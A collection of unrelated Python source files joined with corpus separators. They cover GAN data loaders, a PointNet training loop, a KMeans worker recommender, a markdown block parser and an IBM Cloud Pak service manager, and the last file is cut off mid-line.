2) Number of clusters for each density value at each epoch
3) Histogram of the number of contacts
"""
if filename:
print("FILENAME", filename)
outputPath = os.path.join(outputPath, "")
if outputPath and not os.path.exists(outputPath):
os.makedirs(outputPath)
# Params
clusteringFileDensityColumn = 5
clusteringFileThresholdColumn = 4
clusteringFolder = "clustering"
summaryFile = "summary.txt"
folder = "."
# end params
clusteringSummaryFile = os.path.join(clusteringFolder, summaryFile)
templetizedClusteringSummaryFile = os.path.join("%d", clusteringSummaryFile)
totalNumberOfClustersPerEpoch = getTotalNumberOfClustersPerEpoch(templetizedClusteringSummaryFile, folder)
clustersPerDensityValue = getNumberOfClustersPerEpochForGivenColumn(clusteringFileDensityColumn, templetizedClusteringSummaryFile, folder)
clustersPerThresholdValue = getNumberOfClustersPerEpochForGivenColumn(clusteringFileThresholdColumn, templetizedClusteringSummaryFile, folder)
plt.figure(1)
plt.plot(totalNumberOfClustersPerEpoch, label="All clusters")
if filename != "":
plt.savefig("%s%s_total.png" % (outputPath, filename))
plotClustersPerValue(clustersPerDensityValue)
plt.title("Number of cluser per density value")
plt.xlabel("Epoch")
plt.ylabel("Number of clusters")
plt.legend(loc=2)
if filename != "":
plt.savefig("%s%s_density.png" % (outputPath, filename))
plt.figure(2)
plt.plot(totalNumberOfClustersPerEpoch, label="All clusters")
plotClustersPerValue(clustersPerThresholdValue)
plt.title("Number of cluser per threshold value")
plt.xlabel("Epoch")
plt.ylabel("Number of clusters")
plt.legend(loc=2)
if filename != "":
plt.savefig("%s%s_threshold.png" % (outputPath, filename))
plt.figure(3)
plotContactsHistogram(folder, templetizedClusteringSummaryFile)
plt.title("Contact ratio distribution")
plt.xlabel("Contact ratio")
if filename != "":
plt.savefig("%s%s_hist.png" % (outputPath, filename))
plt.show()
if __name__ == "__main__":
file_name, outputFolder = printHelp()
main(file_name, outputFolder)
|
the-stack_106_23334 | # -*- coding:utf-8 -*-
import os
import random
import math
import numpy as np
import torch
class GenDataIter(object):
""" Toy data iter to load digits"""
def __init__(self, data_file, batch_size):
super(GenDataIter, self).__init__()
self.batch_size = batch_size
self.data_lis = self.read_file(data_file)
# print ((len(self.data_lis[1])))
# exit()
self.data_num = len(self.data_lis)
self.indices = range(self.data_num)
self.num_batches = int(math.ceil(float(self.data_num)/self.batch_size))
self.idx = 0
def __len__(self):
return self.num_batches
def __iter__(self):
return self
def __next__(self):
return self.next()
def reset(self):
self.idx = 0
random.shuffle(self.data_lis)
def next(self):
if self.idx >= self.data_num:
raise StopIteration
index = self.indices[self.idx:self.idx+self.batch_size]
d = [self.data_lis[i] for i in index]
d = torch.LongTensor(np.asarray(d, dtype='int64'))
data = torch.cat([torch.zeros(self.batch_size, 1).long(), d], dim=1)
target = torch.cat([d, torch.zeros(self.batch_size, 1).long()], dim=1)
self.idx += self.batch_size
return data, target
def read_file(self, data_file):
with open(data_file, 'r') as f:
lines = f.readlines()
lis = []
for line in lines:
l = line.strip().split(' ')
l = [int(s) for s in l]
lis.append(l)
return lis
class DisDataIter(object):
""" Toy data iter to load digits"""
def __init__(self, real_data_file, fake_data_file, batch_size):
super(DisDataIter, self).__init__()
self.batch_size = batch_size
real_data_lis = self.read_file(real_data_file)
fake_data_lis = self.read_file(fake_data_file)
self.data = real_data_lis + fake_data_lis
self.labels = [1 for _ in range(len(real_data_lis))] +\
[0 for _ in range(len(fake_data_lis))]
self.pairs = list(zip(self.data, self.labels))
self.data_num = (len(self.pairs))
self.indices = range(self.data_num)
self.num_batches = int(math.ceil(float(self.data_num)/self.batch_size))
self.idx = 0
def __len__(self):
return self.num_batches
def __iter__(self):
return self
def __next__(self):
return self.next()
def reset(self):
self.idx = 0
random.shuffle(self.pairs)
def next(self):
if self.idx >= self.data_num:
raise StopIteration
index = self.indices[self.idx:self.idx+self.batch_size]
pairs = [self.pairs[i] for i in index]
data = [p[0] for p in pairs]
label = [p[1] for p in pairs]
data = torch.LongTensor(np.asarray(data, dtype='int64'))
label = torch.LongTensor(np.asarray(label, dtype='int64'))
self.idx += self.batch_size
return data, label
def read_file(self, data_file):
with open(data_file, 'r') as f:
lines = f.readlines()
lis = []
for line in lines:
l = line.strip().split(' ')
l = [int(s) for s in l]
lis.append(l)
return lis
|
the-stack_106_23335 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class SkuInfos(Model):
"""Collection of SKU information.
:param resource_type: Resource type that this SKU applies to.
:type resource_type: str
:param skus: List of SKUs the subscription is able to use.
:type skus: list of :class:`GlobalCsmSkuDescription
<azure.mgmt.web.models.GlobalCsmSkuDescription>`
"""
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'skus': {'key': 'skus', 'type': '[GlobalCsmSkuDescription]'},
}
def __init__(self, resource_type=None, skus=None):
self.resource_type = resource_type
self.skus = skus
|
the-stack_106_23336 | import pandas as pd
import numpy as np
# import matplotlib.pyplot as plt
from collections import defaultdict
from sklearn import preprocessing
from scipy import sparse
from operator import itemgetter
# from scipy.spatial.distance import cosine
import pickle
# import seaborn
from sklearn.neighbors import NearestNeighbors
from sklearn.cluster import KMeans
# import os
def vectorizer(columnsValues):
# location,service,certification,age_prefernce,gender,types,availability,
# wage_preference,exprience,clients_attended,doorstep_service,
# reference,liscenced,shopping_liscence
vector = []
location = [0] * 44
occupatn = [0] * 23
cert = [0] * 2
age = [0] * 5
gender = [0] * 2
types = [0] * 2
availability = [0] * 4
minimumWage = [0] * 3
exp = [0] * 3
clients = [0] * 3
references = [0] * 2
liscenced = [0] * 2
shoppingliscence = [0] * 2
doorstepService = [0] * 2
location[int(columnsValues[2])] = 1
occupatn[int(columnsValues[3])] = 1
cert[int(columnsValues[4])] = 1
age[int(columnsValues[5])] = 1
gender[int(columnsValues[6])] = 1
types[int(columnsValues[7])] = 1
availability[int(columnsValues[8])] = 1
minimumWage[int(columnsValues[9])] = 1
exp[int(columnsValues[10])] = 1
clients[int(columnsValues[11])] = 1
doorstepService[int(columnsValues[12])] = 1
references[int(columnsValues[13])] = 1
liscenced[int(columnsValues[14])] = 1
shoppingliscence[int(columnsValues[15])] = 1
vector.extend(location)
vector.extend(occupatn)
vector.extend(cert)
vector.extend(age)
vector.extend(gender)
vector.extend(types)
vector.extend(availability)
vector.extend(minimumWage)
vector.extend(exp)
vector.extend(clients)
vector.extend(doorstepService)
vector.extend(references)
vector.extend(liscenced)
vector.extend(shoppingliscence)
return list(vector)
class BuildAndTrain():
def __init__(self):
self.df = self.dataUtility()
self.classesOfColumns = defaultdict(list)
self.occupations = defaultdict(list)
self.kmeans = []
self.df = self.utilities(self.df)
# self.kneighborsOfUserQuery, self.finalCluster = self.KmeanPredictor('1', sparse1[116])
self.classesOfColumns = self.unpickleLoader('clsofclos')
self.occupations = self.unpickleLoader('occupations')
#####################################DATA UTILITY ###################################################
def dataUtility(self):
df = pd.read_csv('final_data.csv')
df = df.drop(['phoneNo', 'id', 'availabilityPreference', 'aadharCard'],
axis=1)
df.dropna(inplace=True)
print('DataUtility Done')
return df
####################################UTILITY FUNCTIONS IMPLEMENTED######################################
def classer(self, temp_df):
# np.logical_and(df[:]['Location'] == 30, df[:]['Occupation'] ==2).nonzero()[0].tolist()
temp_df.loc[temp_df['minimumWage']<5001, 'minimumWage'] = 0
temp_df.loc[np.logical_and(temp_df['minimumWage']>5000, temp_df['minimumWage']<8001),'minimumWage'] = 1
temp_df.loc[np.logical_and(temp_df['minimumWage']>8000, temp_df['minimumWage']<10001),'minimumWage'] = 2
temp_df.loc[(temp_df['experience']<3), 'experience'] = 0
temp_df.loc[np.logical_and(temp_df['experience']>2, temp_df['experience']<7),'experience'] = 1
temp_df.loc[np.logical_and(temp_df['experience']>6, temp_df['experience']<11),'experience'] = 2
temp_df.loc[temp_df['age']<21,'age'] = 0
temp_df.loc[np.logical_and(temp_df['age']>20, temp_df['age']<26),'age'] = 1
temp_df.loc[np.logical_and(temp_df['age']>25, temp_df['age']<30),'age'] = 2
temp_df.loc[np.logical_and(temp_df['age']>29, temp_df['age']<40),'age'] = 3
temp_df.loc[temp_df['clientsAttended']<40, 'clientsAttended'] = 0
temp_df.loc[np.logical_and(temp_df['clientsAttended']>10, temp_df['clientsAttended']<20),'clientsAttended'] = 1
temp_df.loc[np.logical_and(temp_df['clientsAttended']>20, temp_df['clientsAttended']<30),'clientsAttended'] = 2
temp_df.loc[np.logical_and(temp_df['clientsAttended']>30, temp_df['clientsAttended']<40),'clientsAttended'] = 3
temp_df.loc[temp_df['clientsAttended']>40, 'clientsAttended'] = 4
return temp_df
def classes_maker(self,temp_df):
temp = temp_df.columns.tolist()
# temp.remove('age')
for i in temp_df.columns:
le = preprocessing.LabelEncoder()
le.fit(temp_df[i])
self.classesOfColumns[i].append(le.classes_)
temp_df[i] = le.transform(temp_df[i])
return temp_df
def all_occupations_in_a_location(self, temp_df):
# location: index and occupation where index is the position of row in
# Dataframe
# key: occupation lst: list of worker having occupation (index, location)
for index, row in temp_df.iterrows():
self.occupations[row['occupation']].append(index)
for key, values in self.occupations.items():
t_set = list(set(values))
self.occupations[key] = t_set
def occs_splitter(self, df):
for key in self.occupations.keys():
temp_df = df.iloc[self.occupations[key]]
# temp_df.loc[:, ~df.columns.str.contains('^Unnamed')]
temp_df.to_csv(str(key) + '.csv', index=False)
def sparser(self):
for i in range(len(self.occupations.keys())):
sparse = []
temp_df = pd.read_csv(str(i) + '.csv')
for index, row in temp_df.iterrows():
vector = []
location = [0] * np.unique(self.df['location'])
occupatn = [0] * np.unique(self.df['occupation'])
cert = [0] * np.unique(self.df['certification'])
age = [0] * np.unique(self.df['age'])
gender = [0] * np.unique(self.df['gender'])
types = [0] * np.unique(self.df['type'])
availability = [0] * np.unique(self.df['availability'])
minimumWage = [0] * np.unique(self.df['minimumWage'])
exp = [0] * np.unique(self.df['experience'])
clients = [0] * np.unique(self.df['clientsAttended'])
references = [0] * np.unique(self.df['references'])
liscenced = [0] * np.unique(self.df['liscenced'])
shoppingliscence = [0] * np.unique(self.df['shoppingliscence'])
doorstepService = [0] * np.unique(self.df['doorstepService '])
location[row['location']] = 1
occupatn[row['occupation']] = 1
cert[row['certification']] = 1
age[row['age']] = 1
gender[row['gender']] = 1
types[row['type']] = 1
availability[row['availability']] = 1
minimumWage[row['minimumWage']] = 1
exp[row['experience']] = 1
clients[row['clientsAttended']] = 1
doorstepService[row['doorstepService ']] = 1
references[row['references']] = 1
liscenced[row['liscenced']] = 1
shoppingliscence[row['shoppingliscence']] = 1
vector.extend(location)
vector.extend(occupatn)
vector.extend(cert)
vector.extend(age)
vector.extend(gender)
vector.extend(types)
vector.extend(availability)
vector.extend(minimumWage)
vector.extend(exp)
vector.extend(clients)
vector.extend(doorstepService)
vector.extend(references)
vector.extend(liscenced)
vector.extend(shoppingliscence)
sparse.append(list(vector))
self.pickler(sparse, str(i)+'_sparse')
def utilities(self, temp_df):
temp_df = self.classer(temp_df)
temp_df = self.classes_maker(temp_df)
# self.all_occupations_in_a_location(temp_df)
self.occs_splitter(temp_df)
self.sparser()
# self.pickler(self.classesOfColumns, 'clsofclos')
# self.pickler(self.occupations, 'occupations')
print("Utilites executed")
return temp_df
################################GENERIC FUNCTIONS#####################################
def pickler(self, toBeDumped, filename):
with open(str(filename) + '.pkl', 'wb') as file:
file.write(pickle.dumps(toBeDumped))
def unpickleLoader(self,filename):
with open(filename + '.pkl', 'rb') as f:
unpickled = pickle.loads(f.read())
return unpickled
##############MODELLING STUFF##########################################
def modelling(self, service, userquery):
# read the sparse matrix file of the particular job example
temp_files = []
for i in range(len(self.occupations.keys())):
temp_files.append(self.unpickleLoader(str(i)+'_sparse'))
kmodel = KMeans(max_iter=4,
n_clusters=10, n_init=10).fit(temp_files[i])
self.kmeans.append(kmodel)
print('Modelling done')
return self.KmeanPredictor(service, userquery)
def KmeanPredictor(self,service, userquery): # modelNos same as service
kmeanModel = self.unpickleLoader(str(service) + '_model')
print('Predicting kmean cluster')
return self.KMeanClusterIndexes(kmeanModel, kmeanModel.predict(np.array(userquery).reshape(1,-1)), userquery, service)
def KMeanClusterIndexes(self, kMeanModel, userQueryClusterLabel, userquery, service):
temp = kMeanModel.labels_.tolist()
count = 0
li = []
for i in temp:
if i == userQueryClusterLabel:
li.append(count)
count = count + 1
print('getting all points in the same cluster')
return self.clusteredDataframe(li, service, userquery)
def clusteredDataframe(self, clustEleIndex, service, userQuery):
temp_sparse = self.unpickleLoader(str(service) + '_sparse')
temp_df = pd.read_csv(str(service) + '.csv')
KMclustered_dataframe = temp_df.loc[clustEleIndex]
temp_sparse = [temp_sparse[x] for x in clustEleIndex]
print('Temporary cluster formation')
return self.NearestNeighborsAlgo(temp_sparse, userQuery,KMclustered_dataframe)
def NearestNeighborsAlgo(self, clusteredSparse, userQuery, KMeanClusterIndexes):
neigh = NearestNeighbors(n_neighbors=9)
neigh.fit(clusteredSparse)
print('Applying nearest neighbour')
return neigh.kneighbors(np.array(userQuery).reshape(1,-1)), KMeanClusterIndexes
kmeans = []
if __name__ == '__main__':
bnt = BuildAndTrain()
df = bnt.dataUtility()
classesOfColumns = defaultdict(list)
occupations = defaultdict(list)
# pickler(classesOfColumns, 'clsofclos')
# pickler(occupations, 'occupations')
df = bnt.utilities(df)
sparse1 = bnt.unpickleLoader('1_sparse')
kneighborsOfUserQuery, finalCluster = bnt.modelling('1', sparse1[116])
print(kneighborsOfUserQuery, finalCluster)
|
the-stack_106_23339 | """Block-level tokenizer."""
import logging
from typing import List, Optional, Tuple
from .ruler import Ruler
from .token import Token
from .rules_block.state_block import StateBlock
from . import rules_block
LOGGER = logging.getLogger(__name__)
_rules: List[Tuple] = [
# First 2 params - rule name & source. Secondary array - list of rules,
# which can be terminated by this one.
("table", rules_block.table, ["paragraph", "reference"]),
("code", rules_block.code),
("fence", rules_block.fence, ["paragraph", "reference", "blockquote", "list"]),
(
"blockquote",
rules_block.blockquote,
["paragraph", "reference", "blockquote", "list"],
),
("hr", rules_block.hr, ["paragraph", "reference", "blockquote", "list"]),
("list", rules_block.list_block, ["paragraph", "reference", "blockquote"]),
("reference", rules_block.reference),
("heading", rules_block.heading, ["paragraph", "reference", "blockquote"]),
("lheading", rules_block.lheading),
("html_block", rules_block.html_block, ["paragraph", "reference", "blockquote"]),
("paragraph", rules_block.paragraph),
]
class ParserBlock:
"""
ParserBlock#ruler -> Ruler
[[Ruler]] instance. Keep configuration of block rules.
"""
def __init__(self):
self.ruler = Ruler()
for data in _rules:
name = data[0]
rule = data[1]
self.ruler.push(name, rule, {"alt": data[2] if len(data) > 2 else []})
def tokenize(
self, state: StateBlock, startLine: int, endLine: int, silent: bool = False
) -> None:
"""Generate tokens for input range."""
rules = self.ruler.getRules("")
line = startLine
maxNesting = state.md.options.maxNesting
hasEmptyLines = False
while line < endLine:
state.line = line = state.skipEmptyLines(line)
if line >= endLine:
break
if state.sCount[line] < state.blkIndent:
# Termination condition for nested calls.
# Nested calls currently used for blockquotes & lists
break
if state.level >= maxNesting:
# If nesting level exceeded - skip tail to the end.
# That's not ordinary situation and we should not care about content.
state.line = endLine
break
# Try all possible rules.
# On success, rule should:
# - update `state.line`
# - update `state.tokens`
# - return True
for rule in rules:
if rule(state, line, endLine, False):
break
# set state.tight if we had an empty line before current tag
# i.e. latest empty line should not count
state.tight = not hasEmptyLines
# paragraph might "eat" one newline after it in nested lists
if state.isEmpty(state.line - 1):
hasEmptyLines = True
line = state.line
if line < endLine and state.isEmpty(line):
hasEmptyLines = True
line += 1
state.line = line
def parse(
self,
src: str,
md,
env,
outTokens: List[Token],
ords: Optional[Tuple[int, ...]] = None,
) -> Optional[List[Token]]:
"""Process input string and push block tokens into `outTokens`."""
if not src:
return None
state = StateBlock(src, md, env, outTokens, ords)
self.tokenize(state, state.line, state.lineMax)
return state.tokens
|
the-stack_106_23340 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import math
import shutil
import time
import argparse
import pprint
import random as pyrandom
import logging
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.backends.cudnn as cudnn
import torchvision
import pickle
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.dirname(BASE_DIR)
sys.path.append(ROOT_DIR)
from configs.config import cfg
from configs.config import merge_cfg_from_file
from configs.config import merge_cfg_from_list
from configs.config import assert_and_infer_cfg
from utils.training_states import TrainingStates
from utils.utils import get_accuracy, AverageMeter, import_from_file, get_logger
from datasets.dataset_info import DATASET_INFO
def parse_args():
parser = argparse.ArgumentParser(
description='Train a network with Detectron'
)
parser.add_argument(
'--cfg',
dest='cfg_file',
help='Config file for training (and optionally testing)',
default=None,
type=str
)
parser.add_argument(
'opts',
help='See configs/config.py for all options',
default=None,
nargs=argparse.REMAINDER
)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
return parser.parse_args()
def set_random_seed(seed=3):
pyrandom.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
def set_module_bn_momentum(model, momentum=0.1):
def set_bn_momentum(m):
classname = m.__class__.__name__
if classname.find('BatchNorm') != -1:
m.momentum = momentum
model.apply(set_bn_momentum)
def get_bn_decay(epoch):
# 0.5 - 0.01
BN_INIT_DECAY = 0.1
BN_DECAY_RATE = 0.5
BN_DECAY_STEP = cfg.TRAIN.LR_STEPS
BN_DECAY_CLIP = 0.01
bn_momentum = max(BN_INIT_DECAY * BN_DECAY_RATE ** (epoch // BN_DECAY_STEP), BN_DECAY_CLIP)
return bn_momentum
def train(data_loader, model, optimizer, lr_scheduler, epoch, logger=None):
data_time_meter = AverageMeter()
batch_time_meter = AverageMeter()
model.train()
MIN_LR = cfg.TRAIN.MIN_LR
lr_scheduler.step(epoch)
if MIN_LR > 0:
if lr_scheduler.get_lr()[0] < MIN_LR:
for param_group in optimizer.param_groups:
param_group['lr'] = MIN_LR
cur_lr = optimizer.param_groups[0]['lr']
# cur_mom = get_bn_decay(epoch)
# set_module_bn_momentum(model, cur_mom)
tic = time.time()
loader_size = len(data_loader)
training_states = TrainingStates()
for i, (data_dicts) in enumerate(data_loader):
data_time_meter.update(time.time() - tic)
batch_size = data_dicts['point_cloud'].shape[0]
data_dicts_var = {key: value.cuda() for key, value in data_dicts.items()}
optimizer.zero_grad()
losses, metrics = model(data_dicts_var)
loss = losses['total_loss']
loss = loss.mean()
loss.backward()
optimizer.step()
# mean for multi-gpu setting
losses_reduce = {key: value.detach().mean().item() for key, value in losses.items()}
metrics_reduce = {key: value.detach().mean().item() for key, value in metrics.items()}
training_states.update_states(dict(**losses_reduce, **metrics_reduce), batch_size)
batch_time_meter.update(time.time() - tic)
tic = time.time()
if (i + 1) % cfg.disp == 0 or (i + 1) == loader_size:
states = training_states.get_states(avg=False)
states_str = training_states.format_states(states)
output_str = 'Train Epoch: {:03d} [{:04d}/{}] lr:{:.6f} Time:{:.3f}/{:.3f} ' \
.format(epoch + 1, i + 1, len(data_loader), cur_lr, data_time_meter.val, batch_time_meter.val)
logging.info(output_str + states_str)
if (i + 1) == loader_size:
states = training_states.get_states(avg=True)
states_str = training_states.format_states(states)
output_str = 'Train Epoch(AVG): {:03d} [{:04d}/{}] lr:{:.6f} Time:{:.3f}/{:.3f} ' \
.format(epoch + 1, i + 1, len(data_loader), cur_lr, data_time_meter.val, batch_time_meter.val)
logging.info(output_str + states_str)
if logger is not None:
states = training_states.get_states(avg=True)
for tag, value in states.items():
logger.scalar_summary(tag, value, int(epoch))
def validate(data_loader, model, epoch, logger=None):
data_time_meter = AverageMeter()
batch_time_meter = AverageMeter()
model.eval()
tic = time.time()
loader_size = len(data_loader)
training_states = TrainingStates()
for i, (data_dicts) in enumerate(data_loader):
data_time_meter.update(time.time() - tic)
batch_size = data_dicts['point_cloud'].shape[0]
with torch.no_grad():
data_dicts_var = {key: value.cuda() for key, value in data_dicts.items()}
losses, metrics = model(data_dicts_var)
# mean for multi-gpu setting
losses_reduce = {key: value.detach().mean().item() for key, value in losses.items()}
metrics_reduce = {key: value.detach().mean().item() for key, value in metrics.items()}
training_states.update_states(dict(**losses_reduce, **metrics_reduce), batch_size)
batch_time_meter.update(time.time() - tic)
tic = time.time()
states = training_states.get_states(avg=True)
states_str = training_states.format_states(states)
output_str = 'Validation Epoch: {:03d} Time:{:.3f}/{:.3f} ' \
.format(epoch + 1, data_time_meter.val, batch_time_meter.val)
logging.info(output_str + states_str)
if logger is not None:
for tag, value in states.items():
logger.scalar_summary(tag, value, int(epoch))
return states['IoU_' + str(cfg.IOU_THRESH)]
def main():
# parse arguments
args = parse_args()
if args.cfg_file is not None:
merge_cfg_from_file(args.cfg_file)
if args.opts is not None:
merge_cfg_from_list(args.opts)
assert_and_infer_cfg()
if not os.path.exists(cfg.OUTPUT_DIR):
os.makedirs(cfg.OUTPUT_DIR)
# set logger
cfg_name = os.path.basename(args.cfg_file).split('.')[0]
log_file = '{}_{}_train.log'.format(cfg_name, time.strftime('%Y-%m-%d-%H-%M'))
log_file = os.path.join(cfg.OUTPUT_DIR, log_file)
logger = get_logger(log_file)
logger.info(pprint.pformat(args))
logger.info('config:\n {}'.format(pprint.pformat(cfg)))
# set visualize logger
logger_train = None
logger_val = None
if cfg.USE_TFBOARD:
from utils.logger import Logger
logger_dir = os.path.join(cfg.OUTPUT_DIR, 'tb_logger', 'train')
if not os.path.exists(logger_dir):
os.makedirs(logger_dir)
logger_train = Logger(logger_dir)
logger_dir = os.path.join(cfg.OUTPUT_DIR, 'tb_logger', 'val')
if not os.path.exists(logger_dir):
os.makedirs(logger_dir)
logger_val = Logger(logger_dir)
# import dataset
set_random_seed()
logging.info(cfg.DATA.FILE)
dataset_def = import_from_file(cfg.DATA.FILE)
collate_fn = dataset_def.collate_fn
dataset_def = dataset_def.ProviderDataset
train_dataset = dataset_def(
cfg.DATA.NUM_SAMPLES,
split=cfg.TRAIN.DATASET,
one_hot=True,
random_flip=True,
random_shift=True,
extend_from_det=cfg.DATA.EXTEND_FROM_DET)
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=cfg.TRAIN.BATCH_SIZE,
shuffle=True,
num_workers=cfg.NUM_WORKERS,
pin_memory=True,
drop_last=True,
collate_fn=collate_fn)
val_dataset = dataset_def(
cfg.DATA.NUM_SAMPLES,
split=cfg.TEST.DATASET,
one_hot=True,
random_flip=False,
random_shift=False,
extend_from_det=cfg.DATA.EXTEND_FROM_DET)
val_loader = torch.utils.data.DataLoader(
val_dataset,
batch_size=cfg.TEST.BATCH_SIZE,
shuffle=False,
num_workers=cfg.NUM_WORKERS,
pin_memory=True,
drop_last=False,
collate_fn=collate_fn)
logging.info('training: sample {} / batch {} '.format(len(train_dataset), len(train_loader)))
logging.info('validation: sample {} / batch {} '.format(len(val_dataset), len(val_loader)))
logging.info(cfg.MODEL.FILE)
model_def = import_from_file(cfg.MODEL.FILE)
model_def = model_def.PointNetDet
input_channels = 3 if not cfg.DATA.WITH_EXTRA_FEAT else cfg.DATA.EXTRA_FEAT_DIM
# NUM_VEC = 0 if cfg.DATA.CAR_ONLY else 3
dataset_name = cfg.DATA.DATASET_NAME
assert dataset_name in DATASET_INFO
datset_category_info = DATASET_INFO[dataset_name]
NUM_VEC = len(datset_category_info.CLASSES) # rgb category as extra feature vector
NUM_CLASSES = cfg.MODEL.NUM_CLASSES
model = model_def(input_channels, num_vec=NUM_VEC, num_classes=NUM_CLASSES)
logging.info(pprint.pformat(model))
if cfg.NUM_GPUS > 1:
model = torch.nn.DataParallel(model)
model = model.cuda()
parameters_size = 0
for p in model.parameters():
parameters_size += p.numel()
logging.info('parameters: %d' % parameters_size)
logging.info('using optimizer method {}'.format(cfg.TRAIN.OPTIMIZER))
if cfg.TRAIN.OPTIMIZER == 'adam':
optimizer = optim.Adam(model.parameters(), lr=cfg.TRAIN.BASE_LR,
betas=(0.9, 0.999), weight_decay=cfg.TRAIN.WEIGHT_DECAY)
elif cfg.TRAIN.OPTIMIZER == 'sgd':
optimizer = optim.SGD(model.parameters(), lr=cfg.TRAIN.BASE_LR,
momentum=cfg.TRAIN.MOMENTUM, weight_decay=cfg.TRAIN.WEIGHT_DECAY)
else:
assert False, 'Not support now.'
# miles = [math.ceil(num_epochs*3/8), math.ceil(num_epochs*6/8)]
# assert isinstance(LR_SETP, list)
LR_STEPS = cfg.TRAIN.LR_STEPS
LR_DECAY = cfg.TRAIN.GAMMA
if len(LR_STEPS) > 1:
lr_scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=LR_STEPS, gamma=LR_DECAY)
else:
lr_scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=LR_STEPS[0], gamma=LR_DECAY)
best_prec1 = 0
best_epoch = 0
start_epoch = 0
# optionally resume from a checkpoint
if cfg.RESUME:
if os.path.isfile(cfg.TRAIN.WEIGHTS):
checkpoint = torch.load(cfg.TRAIN.WEIGHTS)
start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
best_epoch = checkpoint['best_epoch']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
logger.info("=> loaded checkpoint '{}' (epoch {})".format(cfg.TRAIN.WEIGHTS, checkpoint['epoch']))
else:
logger.error("=> no checkpoint found at '{}'".format(cfg.TRAIN.WEIGHTS))
# resume from other pretrained model
if start_epoch == cfg.TRAIN.MAX_EPOCH:
start_epoch = 0
best_prec1 = 0
best_epoch = 0
if cfg.EVAL_MODE:
validate(val_loader, model, start_epoch, logger_val)
return
MAX_EPOCH = cfg.TRAIN.MAX_EPOCH
for n in range(start_epoch, MAX_EPOCH):
train(train_loader, model, optimizer, lr_scheduler, n, logger_train)
ious_gt = validate(val_loader, model, n, logger_val)
prec1 = ious_gt
is_best = False
if prec1 > best_prec1:
best_prec1 = prec1
best_epoch = n + 1
is_best = True
logging.info('Best model {:04d}, Validation Accuracy {:.6f}'.format(best_epoch, best_prec1))
save_data = {
'epoch': n + 1,
'state_dict': model.state_dict() if cfg.NUM_GPUS == 1 else model.module.state_dict(),
'optimizer': optimizer.state_dict(),
'best_prec1': best_prec1,
'best_epoch': best_epoch
}
if (n + 1) % 5 == 0 or (n + 1) == MAX_EPOCH:
torch.save(save_data, os.path.join(cfg.OUTPUT_DIR, 'model_%04d.pth' % (n + 1)))
if is_best:
torch.save(save_data, os.path.join(cfg.OUTPUT_DIR, 'model_best.pth'))
if (n + 1) == MAX_EPOCH:
torch.save(save_data, os.path.join(cfg.OUTPUT_DIR, 'model_final.pth'))
logging.info('Best model {:04d}, Validation Accuracy {:.6f}'.format(best_epoch, best_prec1))
if __name__ == '__main__':
main()
|
the-stack_106_23341 | # Copyright 2021, 2022 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from typing import Dict
import cpo.config
from cpo.lib.cloud_pak_for_data.cpd_4_0_0.types.cloud_pak_for_data_service_license import CloudPakForDataServiceLicense
from cpo.lib.cloud_pak_for_data.cpd_4_0_0.types.custom_resource_metadata import CustomResourceMetadata
from cpo.lib.cloud_pak_for_data.cpd_4_0_0.types.subscription_metadata import (
SubscriptionMetadata,
SubscriptionMetadataSpec,
)
from cpo.lib.error import DataGateCLIException
class CloudPakForDataServiceManager:
"""Manages IBM Cloud Pak for Data operator subscriptions and custom
resources"""
def __init__(self):
self._custom_resources: Dict[str, CustomResourceMetadata] = {}
self._subscriptions: Dict[str, SubscriptionMetadata] = {}
def get_custom_resource_metadata(self, service_name: str) -> CustomResourceMetadata:
"""Returns custom resource metadata for the given service name
Parameters
----------
service_name
name of the service for which custom resource metadata shall be returned
Returns
-------
CustomResourceMetadata
custom resource metadata object
"""
self._initialize_custom_resources_dict_if_required()
if service_name not in self._custom_resources:
raise DataGateCLIException("Unknown IBM Cloud Pak for Data service")
return self._custom_resources[service_name]
def get_custom_resource_metadata_dict(self) -> Dict[str, CustomResourceMetadata]:
"""Returns custom resource metadata for all services
Returns
-------
Dict[str, CustomResourceMetadata]
dictionary mapping service names to custom resource metadata objects
"""
self._initialize_custom_resources_dict_if_required()
return self._custom_resources
def get_subscription_metadata(self, operator_name: str) -> SubscriptionMetadata:
"""Returns subscription metadata for the given operator name
Parameters
----------
operator_name
name of the operator for which subscription metadata shall be returned
Returns
-------
SubscriptionMetadata
subscription metadata object
"""
self._initialize_subscriptions_dict_if_required()
if operator_name not in self._subscriptions:
raise DataGateCLIException("Unknown IBM Cloud Pak for Data service")
return self._subscriptions[operator_name]
def get_subscription_metadata_dict_for_cloud_pak_for_data_services(self) -> Dict[str, SubscriptionMetadata]:
"""Returns subscription metadata for all operators
Returns
-------
Dict[str, SubscriptionMetadata]
dictionary mapping operator names to subscription metadata objects
"""
self._initialize_subscriptions_dict_if_required()
return dict(filter(lambda element: element[1].service, self._subscriptions.items()))
def is_cloud_pak_for_data_service(self, service_name: str):
"""Returns whether there is an IBM Cloud Pak for Data service with the
given name
Parameters
----------
service_name
name of the service to be checked
Returns
-------
bool
true, if there is an IBM Cloud Pak for Data service with the given name
"""
self._initialize_custom_resources_dict_if_required()
return service_name in self._custom_resources
def _initialize_custom_resources_dict_if_required(self):
if len(self._custom_resources) == 0:
with open(
